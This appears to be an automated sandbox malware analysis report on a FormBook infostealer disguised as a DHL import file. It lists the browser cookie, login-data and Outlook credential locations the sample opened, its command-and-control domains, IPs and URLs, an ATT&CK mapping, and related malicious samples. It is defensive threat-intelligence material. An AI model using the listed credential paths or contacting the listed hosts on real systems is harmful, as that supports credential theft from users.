Code function: 0_2_0051BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0051BB6F

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_004E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004E42DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3505463052.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3508272257.0000000004BE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3506460086.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3506551312.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1897339030.0000000003920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1897068289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3506566104.0000000002500000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1897614409.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\net.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\net.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: DHL_IMPORT_8236820594.exe	Binary or memory string: WIN_81
Source: DHL_IMPORT_8236820594.exe	Binary or memory string: WIN_XP
Source: DHL_IMPORT_8236820594.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: DHL_IMPORT_8236820594.exe	Binary or memory string: WIN_XPe
Source: DHL_IMPORT_8236820594.exe	Binary or memory string: WIN_VISTA
Source: DHL_IMPORT_8236820594.exe	Binary or memory string: WIN_7
Source: DHL_IMPORT_8236820594.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3505463052.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3508272257.0000000004BE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3506460086.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3506551312.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1897339030.0000000003920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1897068289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3506566104.0000000002500000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1897614409.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00561204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00561204
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00561806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00561806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL_IMPORT_8236820594.exe	42%	ReversingLabs	Win32.Trojan.AutoitInject
DHL_IMPORT_8236820594.exe	32%	Virustotal		Browse
DHL_IMPORT_8236820594.exe	100%	Avira	DR/AutoIt.Gen8
DHL_IMPORT_8236820594.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
trifecta.center	0%	Virustotal		Browse
wcp95.top	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.figa1digital.services/r2pg/	0%	Avira URL Cloud	safe
http://www.wddb97.top/a3g3/	0%	Avira URL Cloud	safe
http://www.comvq.fun/aajw/	0%	Avira URL Cloud	safe
http://www.roopiedutech.online/3m9t/	0%	Avira URL Cloud	safe
http://roopiedutech.online/3m9t/?FLL4t=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHB	0%	Avira URL Cloud	safe
http://www.trifecta.center/3c6w/	0%	Avira URL Cloud	safe
https://vrxlzluy.shop/o91n/?FLL4t=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus	0%	Avira URL Cloud	safe
http://www.figa1digital.services	0%	Avira URL Cloud	safe
http://www.harmonid.life/aq3t/	0%	Avira URL Cloud	safe
http://www.vrxlzluy.shop/o91n/	0%	Avira URL Cloud	safe
http://www.wcp95.top/rj0s/	0%	Avira URL Cloud	safe
http://www.gokulmohan.online/xh7d/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
trifecta.center	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
www.figa1digital.services	188.114.97.3	true	true		unknown
wcp95.top	154.23.184.95	true	true	2%, Virustotal, Browse	unknown
wddb97.top	206.119.82.172	true	true		unknown
www.gokulmohan.online	172.67.185.22	true	true		unknown
www.harmonid.life	203.161.49.193	true	true		unknown
roopiedutech.online	103.191.208.137	true	true		unknown
iuyi542.xyz	38.47.237.27	true	true		unknown
www.vrxlzluy.shop	188.114.96.3	true	true		unknown
www.comvq.fun	3.111.160.216	true	true		unknown
www.wcp95.top	unknown	unknown	false		unknown
www.iuyi542.xyz	unknown	unknown	true		unknown
www.wddb97.top	unknown	unknown	false		unknown
www.trifecta.center	unknown	unknown	false		unknown
www.roopiedutech.online	unknown	unknown	false		unknown
www.xtelify.tech	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.roopiedutech.online/3m9t/	true	Avira URL Cloud: safe	unknown
http://www.figa1digital.services/r2pg/	true	Avira URL Cloud: safe	unknown
http://www.trifecta.center/3c6w/	true	Avira URL Cloud: safe	unknown
http://www.wddb97.top/a3g3/	true	Avira URL Cloud: safe	unknown
http://www.vrxlzluy.shop/o91n/	true	Avira URL Cloud: safe	unknown
http://www.comvq.fun/aajw/	true	Avira URL Cloud: safe	unknown
http://www.harmonid.life/aq3t/	true	Avira URL Cloud: safe	unknown
http://www.wcp95.top/rj0s/	true	Avira URL Cloud: safe	unknown
http://www.gokulmohan.online/xh7d/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://vrxlzluy.shop/o91n/?FLL4t=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus	net.exe, 00000005.00000002.3507156756.0000000003A06000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.0000000002D26000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://roopiedutech.online/3m9t/?FLL4t=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHB	net.exe, 00000005.00000002.3507156756.0000000004372000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.0000000003692000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/twbs/bootstrap/blob/master/LICENSE)	net.exe, 00000005.00000002.3507156756.0000000003874000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.0000000002B94000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208468387.000000002C254000.00000004.80000000.00040000.00000000.sdmp	false		high
http://www.figa1digital.services	gdWgEHryJDTaS.exe, 00000008.00000002.3508272257.0000000004C75000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://getbootstrap.com/)	net.exe, 00000005.00000002.3507156756.0000000003874000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.0000000002B94000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208468387.000000002C254000.00000004.80000000.00040000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
206.119.82.172	wddb97.top	United States	174	COGENT-174US	true
38.47.237.27	iuyi542.xyz	United States	174	COGENT-174US	true
203.161.49.193	www.harmonid.life	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
188.114.97.3	www.figa1digital.services	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	www.vrxlzluy.shop	European Union	13335	CLOUDFLARENETUS	true
103.191.208.137	roopiedutech.online	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
3.111.160.216	www.comvq.fun	United States	16509	AMAZON-02US	true
154.23.184.95	wcp95.top	United States	174	COGENT-174US	true
3.33.130.190	trifecta.center	United States	8987	AMAZONEXPANSIONGB	true
172.67.185.22	www.gokulmohan.online	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1549014
Start date and time:	2024-11-05 07:10:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL_IMPORT_8236820594.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/2@11/10
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 89% Number of executed functions: 41 Number of non-executed functions: 305
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:12:02	API Interceptor	6878051x Sleep call for process: net.exe modified
06:10:51	Task Scheduler	Run new task: {1FA43344-5408-43D7-B399-57C72529F41D} path: .

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
206.119.82.172	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	www.wddb97.top/a3g3/
	Arrival Notice_pdf.exe	Get hash	malicious	FormBook	Browse	www.d97fw.top/07qt/
	RECIEPT.PDF.exe	Get hash	malicious	FormBook	Browse	www.d97fw.top/j0mp/
38.47.237.27	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse
203.161.49.193	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	www.harmonid.life/aq3t/
	Statement Cargomind 2024-09-12 (K07234).exe	Get hash	malicious	FormBook	Browse	www.fitlifa.xyz/6tsn/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.simplek.top/ep69/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.simplek.top/ep69/
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	www.futurevision.life/hxmz/
	Udspecialiser45.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.funtechie.top/udud/
	qEW7hMvyV7.exe	Get hash	malicious	FormBook	Browse	www.winnov8.top/abt9/
	PR44238-43433.exe	Get hash	malicious	FormBook	Browse	www.innovtech.life/nq8t/
	RFQ-9877678-9988876509886546887.exe	Get hash	malicious	FormBook	Browse	www.innovtech.life/nq8t/
	RFQ-9877678-9988876509886546884.exe	Get hash	malicious	FormBook	Browse	www.innovtech.life/nq8t/
188.114.97.3	TGh6AUbQkh.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	221580cm.nyashkoon.in/EternalLinetoPhpjsPollAuthwindowslocal.php
	QUOTATION_NOVQTRA071244.PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/16zkKlMo/download
	SecuriteInfo.com.Trojan.DownLoader47.46584.19040.8588.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	SecuriteInfo.com.Trojan.DownLoader47.46584.19040.8588.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	Ponta Saheb. PO 4400049817.exe	Get hash	malicious	FormBook	Browse	www.1450thedove.com/z3su/
	URGENT REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/5hcm/
	A4mmSHCUi2.exe	Get hash	malicious	FormBook	Browse	www.awarnkishesomber.space/rmi6/
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	www.timizoasisey.shop/3p0l/
	lf1SPbZI3V.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/alpha2/five/fre.php
	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/vdlzo

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.gokulmohan.online	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	172.67.185.22
www.gokulmohan.online	FACTURA A-7507_H1758.exe	Get hash	malicious	GuLoader	Browse	104.21.64.124
www.harmonid.life	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	203.161.49.193
www.vrxlzluy.shop	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
www.comvq.fun	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	3.111.160.216
www.comvq.fun	mm.exe	Get hash	malicious	Unknown	Browse	3.111.160.216

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://workflow365.m-pages.com/Q1KRhV/truluma-insurance-agency	Get hash	malicious	Unknown	Browse	104.18.11.207
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	https://mattandnatbakery.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.133.135
	rSolicituddecotizaci__n.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	https://zip-store.oss-ap-southeast-1.aliyuncs.com/updated%20file/paracms.txt	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
COGENT-174US	ppc.elf	Get hash	malicious	Mirai	Browse	154.42.69.237
	mpsl.elf	Get hash	malicious	Mirai	Browse	38.116.142.107
	m68k.elf	Get hash	malicious	Mirai	Browse	38.139.147.165
	spc.elf	Get hash	malicious	Mirai	Browse	38.96.22.253
	mips.elf	Get hash	malicious	Mirai	Browse	38.165.211.175
	sh4.elf	Get hash	malicious	Mirai	Browse	204.157.239.7
	x86.elf	Get hash	malicious	Mirai	Browse	38.230.129.99
	linux_arm6.elf	Get hash	malicious	Chaos	Browse	154.12.82.11
	nuklear.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	38.154.115.165
	linux_arm5.elf	Get hash	malicious	Chaos	Browse	154.12.82.11
COGENT-174US	ppc.elf	Get hash	malicious	Mirai	Browse	154.42.69.237
	mpsl.elf	Get hash	malicious	Mirai	Browse	38.116.142.107
	m68k.elf	Get hash	malicious	Mirai	Browse	38.139.147.165
	spc.elf	Get hash	malicious	Mirai	Browse	38.96.22.253
	mips.elf	Get hash	malicious	Mirai	Browse	38.165.211.175
	sh4.elf	Get hash	malicious	Mirai	Browse	204.157.239.7
	x86.elf	Get hash	malicious	Mirai	Browse	38.230.129.99
	linux_arm6.elf	Get hash	malicious	Chaos	Browse	154.12.82.11
	nuklear.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	38.154.115.165
	linux_arm5.elf	Get hash	malicious	Chaos	Browse	154.12.82.11
VNPT-AS-VNVNPTCorpVN	nuklear.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	14.190.8.166
	arm4.elf	Get hash	malicious	Mirai	Browse	14.237.62.11
	m68k.elf	Get hash	malicious	Mirai	Browse	113.162.218.53
	mips.elf	Get hash	malicious	Mirai	Browse	113.162.218.36
	sh4.elf	Get hash	malicious	Mirai	Browse	113.161.24.110
	nuklear.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	113.166.84.51
	mpsl.elf	Get hash	malicious	Mirai	Browse	14.236.143.142
	sora.arm.elf	Get hash	malicious	Mirai	Browse	123.19.47.224
	sora.mips.elf	Get hash	malicious	Mirai	Browse	113.184.59.180
	nullnet_load.i686.elf	Get hash	malicious	Mirai	Browse	113.191.64.45

Process:	C:\Windows\SysWOW64\net.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\batchers

Download File

Process:	C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.991042528821953
Encrypted:	true
SSDEEP:	6144:zsM3QV9FSWV4zbNAlyWbwOxwEYBfgiFqF5CCOAuydZn+WO/FH3mZUuX:payCEqlHSPBIhHCCauChjuX
MD5:	1312DA5E6061BF996CEAEC00442ABF2D
SHA1:	A78B027ECF1E5C04C2E515459D854649E21F5D5D
SHA-256:	8C6916152F6818E0DB453B10433D1FD3A9AB64D22CBA57E808F4D1BD34BFA44A
SHA-512:	4242A2616BB60E525D8C67AEB7AC142E1B1E8D2F3E14924364E00B79B039A2B52A1CD0142788B47CAAC2D3A51F4FB49D71C16BBE29DFB483D3978BAEE4C5E6F5
Malicious:	false
Reputation:	low
Preview:	.....KZF2l.B..w.F1..cNG...ZF24ZZKMOICKZF24ZZKMOICKZF24ZZ.MOIMT.H2.S.j.N..j..[Gz9"(;"&z%SZ45?m-,c9/(.]4z...i.$>#.9WPoMOICKZFK5S.v-(.~+=..T=.Q..y+=.(..w-(.Y...T=..$,!~+=.24ZZKMOI..ZF~5[Z....CKZF24ZZ.MMHHJQF2l^ZKMOICKZFb ZZK]OIC;^F24.ZK]OICIZF44ZZKMOIEKZF24ZZK=KICIZF24ZZIM..CKJF2$ZZKM_IC[ZF24ZZ[MOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZe917KZF.c^ZK]OIC.^F2$ZZKMOICKZF24ZZkMO)CKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOICKZF24ZZKMOI

Static File Info

General

